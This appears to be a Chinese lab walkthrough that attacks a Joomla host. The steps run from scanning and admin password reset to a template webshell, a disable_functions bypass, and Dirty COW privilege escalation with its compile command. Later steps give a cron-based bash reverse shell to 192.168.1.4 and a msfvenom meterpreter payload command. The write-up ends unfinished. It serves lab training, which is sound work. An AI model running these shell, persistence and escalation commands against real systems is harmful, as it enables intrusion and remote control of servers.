1、常規掃描一下,目標主機開放的端口
2、訪問80端口,首頁如下
3、御劍掃描一下網站目錄
4、nikto掃描web站點,探測到后台
5、Xray爬蟲模式掃描漏洞,沒有發現什么可利用漏洞
6、github找到Joomla框架的掃描工具 https://github.com/OWASP/joomscan
7、訪問備份文件,得到內容如下以及相關路徑
8、因為對外開放了3306端口,使用數據庫遠程管理工具
9、因為這個加鹽是框架代碼層面加的,這里找到cms的官方說明文檔
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
10、替換掉不知道密碼的密文,注意后台網站記得關閉掉再改
11、后台登錄administrator/admin ,進入后台如下
12、在Extensions -> Templates -> Templates 存在getshell
13、Templates點進去后界面如下
14、New File 創建文件
15、Getshell
16、寫入webshell 訪問 /templates/beez3/haha.php
17、查看是否成功寫入,可以
18、蟻劍連接webshell,ok
19、進入終端發現沒有辦法執行命令 顯示 ret=127 應該是服務端禁用了部分命令執行的函數
20、利用蟻劍擴展插件繞過disable_functions禁用
21、選擇模式LD_PRELOAD
22、配置
23、上傳 .antproxy.php
24、改一下目標url 后連接,密碼不用改,還是原webshell的密碼
25、打開終端,查看是否可以執行命令,ok
26、踩坑點,進行多次msf上線失敗。發現 IP不是1.110的而是93.120的 IP。
應該是做了端口映射!120的80端口映射或者轉發到110的80端口。這里掃描了一下內網
27、再掃描一下端口開放情況,fscan一掃就廢了,這里掃描用的是FscanX感覺沒Fscan強。
28、因為這里是做了端口的轉發,而且還不出網,涼涼了。但是 /tmp目錄發現東西!
29、應該是一個mysql管理員用的ssh賬戶,xshell連上去看看
30、提權:通過nuame -a參數發現內核是2.6.32,內核版本比較老,所以考慮用臟牛提權
臟牛c源碼https://github.com/FireFart/dirtycow/blob/master/dirty.c 復制粘貼到 txt 重命名為 c文件
編譯命令:gcc -pthread dirty.c -o dirty -lcrypt
運行完了su 切過去就行 記得 mv /tmp/passwd.bak /etc/passwd
31、因為后面把passwd的文件恢復過去了,所以firefaart用戶已經是沒有了
一旦su切換用戶后就無法返回firefart用戶了,因為前面備份的passwd.bak還原回去了
32、百度了一下,好多方法都試了一下,都不行,就很尷尬,用戶可以創建但是沒有辦法設置密碼
然后目前是root權限如果wwwuser這個用戶改密碼了就無法進來,因為我們知道了www的明文密碼
所以這里創建一個tom用戶,然后在去改/etc/shadow的密文,密文用的就是www的密文,結果不行。
33、踩坑點,臟牛提權后,ssh一旦斷開,所有用戶都無法進行ssh連接,密碼沒有問題。臟牛提權的問題
注意:這個版本提完權后,當前的ssh還能用!一旦斷開所有用戶都連不上ssh,靶場重啟所有用戶也都登不上。
換了其他的內核版本發現沒有這種問題存在,所以這里不建議進行臟牛提權,一提就廢,只能恢復快照!
33、計划任務權限維持 敲命令 crontab -e 后寫入代碼 */1 * * * * bash -i >& /dev/tcp/192.168.1.4/8888 0>&1
計划任務通過crontab -l 可以直接查看到相關的任務,想深入一點的可以自己做一下計划任務隱藏
34、msf上線 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.4 lport=7799 -f elf -o msf.elf
未完,明天繼續,加個vx一起學習~~
